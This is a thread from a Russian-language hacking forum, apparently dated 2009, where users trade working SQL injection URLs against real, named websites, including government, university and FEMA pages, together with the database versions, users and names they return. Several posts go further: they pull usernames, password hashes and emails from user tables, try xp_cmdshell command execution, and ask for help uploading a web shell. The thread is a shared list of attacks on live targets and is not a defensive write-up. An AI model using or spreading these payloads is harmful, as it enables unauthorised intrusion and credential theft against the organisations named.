ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10561  
Старый 30.08.2009, 11:32
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://www.hjzf.gov.cn/admin/attachment.php?attachmentid=1+union+select+1,2,concat(0x3,version(),database(),user()),4,5,6/*
4.0.27-logsite_hjgovsite_hjgov@localhost
 
Ответить с цитированием

  #10562  
Старый 30.08.2009, 12:28
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://www.2bike.ru/moto.php?id=-7+union+select+1,group_concat(table_name),3+from+I NFORMATION_SCHEMA.TABLES+where+table_schema+not+in +('information_schema')--
obzor,obzor1

Последний раз редактировалось DrAssault; 30.08.2009 в 12:38..
 
Ответить с цитированием

  #10563  
Старый 30.08.2009, 13:32
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 6
http://home.uprm.edu/hrjobs/showjob.php?id=-330'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,24/*

Database Version: 4.1.12-log
Database name: hrjobs
User name: rea@home3.uprm.edu

---------------------------------------------------------------------------------------------------------------

PR 5
http://ing.uprm.edu/events2.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10/*

Database Version: 4.1.12-log
Database name: pagina_decanato
User name: decainge@admin.uprm.edu

------------------------------------------------------------------------------------------------------------------------

PR 5
http://oiip.uprm.edu/building.php?id=-132'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,31/*

Database Version: 4.1.12-log
Database name: reabuilding
User name: oiip@admin.uprm.edu
 
Ответить с цитированием

  #10564  
Старый 30.08.2009, 15:26
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
Arrow

Топ серверов lineage.
http://l2.kiktours.com

Зарегестрированые пользыватели:
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,name,pass),mail+from+l2portal.users-- 
Зарегестрированые сервера:
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a3a3a3a3a,user,web),server_type+from+l2portal.servers-- 
Вся БД: (Там БД от нескольких сайтов...)
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME),2+from+INFORMATION_SCHEMA.COLUMNS-- 
Если у когото получится залить шелл, плиз ПМ.
 
Ответить с цитированием

  #10565  
Старый 30.08.2009, 18:06
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

http://www.t-fisi.de/links.php?id=1+anD+1=-1+union+select+1,0,version()
Version = 5.0.51a-24+lenny1
User = web1@localhost
Database = usr_web1_1

Columns: Table bb1_users
Код:
username
	password
	email
	userposts
	groupid
	rankid
	title
	regdate
	lastvisit
	lastactivity
	usertext
	signature
	icq
	aim
	yim
	msn
	homepage
	birthday
	avatarid
	gender
	showemail
	admincanemail
	usercanemail
	invisible
	usecookies
	styleid
	activation
	blocked
	daysprune
	timezoneoffset
	startweek
	dateformat
	timeformat
	emailnotify
	buddylist
	ignorelist
	receivepm
	emailonpm
	pmpopup
	umaxposts
	showsignatures
	showavatars
	showimages
	nosessionhash
	ratingcount
	ratingpoints
	threadview
Columns: Table wp_users
Код:
user_login
	user_pass
	user_nicename
	user_email
	user_url
	user_registered
	user_activation_key
	user_status
	display_name

Последний раз редактировалось [x60]unu; 30.08.2009 в 18:47..
 
Ответить с цитированием

  #10566  
Старый 30.08.2009, 20:17
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://www.emiclassics.com/artistextras.php?aid=1+union+select+concat(0x2a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+limit+1,1/*
4.1.22-logemiclassics2@vlonj201w2.emihosting.comemiclassi cs2
 
Ответить с цитированием

  #10567  
Старый 30.08.2009, 20:17
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Код:
http://www.aamds.org/aplastic/news/news.php?id=9+and+1=0+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6--
PR: 6

User: aamdsor_xweb@localhost
Version: 4.1.22-standard

Код:
http://www.scut-usa.org/news.php?id=9+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version()),5--
PR: 3

User: news@localhost
Version: 4.1.22

Последний раз редактировалось mr.gr33n; 30.08.2009 в 23:18..
 
Ответить с цитированием

  #10568  
Старый 30.08.2009, 22:56
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
Smile

Компания "Комплекс-С"
Цитата:
http://www.complexs.ru/index.php?page=about&pid=101+union+select+1,concat _ws(0x3a,database(),user(),version())/*
Код:
complexs:root@localhost:5.0.27-community-nt-log
Emergency Management Institute
Цитата:
http://training.fema.gov/IS/isfaqdetails.asp?id=2';Use+master+exec+xp_cmdhshel l+'ping 127.0.0.1'--&cat=General%20Questions
Запрос какой-то мудошный,при любой подстановке ошибка синтаксиса. Но через xp_cmdshell итд должно работать,проверьте кому интересно...
 
Ответить с цитированием

  #10569  
Старый 30.08.2009, 23:28
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

http://asrabruzzo.it
http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,version(),3,4/*
version - 4.1.20
user - dbuser@localhost
database - asrabruzzo

http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,coNcaT(0x3a,email,0x3a,name,0x3a,pass,0x3a,uname ,0x3a,user_icq),3,4/**/FROM/**/xoops_users/*

admin
http://www.asrabruzzo.it/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/seLecT/**/1,concAt(id,0x3a,username,0x3a,password),3,4/**/FROM/**/accounts/*
 
Ответить с цитированием

  #10570  
Старый 31.08.2009, 00:29
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://www.reha.cn/in_y1.php?id=1
+union+select+concat(0x3a,version(),user(),database()),3
5.0.51a-24root@localhostreha
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ